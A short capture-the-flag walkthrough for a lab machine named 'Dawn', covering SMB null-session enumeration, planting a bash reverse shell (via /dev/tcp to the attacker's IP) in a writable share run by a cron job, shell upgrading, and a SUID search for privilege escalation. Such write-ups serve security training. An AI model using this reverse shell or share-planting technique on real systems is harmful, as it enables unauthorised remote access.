🐧Dawn

192.168.234.11

Enumeration

Port 80

Dirbuster results

Grabbed management.log file.

Now we now at least two users names dawn and ganimedes. This looks like a cron job running every minute in the log.

Port 139/445

Check SMB ports for null session login.

smbclient -L  \\\\192.168.234.11\\ -N

ITDEPT folder empty.

We do have read/write permissions for it though.

Port 3306

No information gathered about this port.

Shell

Looked for a hint here because my Meterpreter binary kept getting an error and the session would close immediately. I found that it is because I am an idiot and did not set the multi/handler to accept the payload type I was using when I made the binary.

Looked at a write up when my binary was not working and found that a simple reverse shell was being used. Easy enough. Made product-control and dropped it in ITDEPT.

!#/bin/sh
bash -c 'exec bash -i &>/dev/tcp/192.168.49.234/9966 <&1'

Get a decent shell.

python -c 'import pty; pty.spawn("/bin/bash")'

Root

Found that zsh was stickied.

find / -perm -u=s -type f 2>/dev/null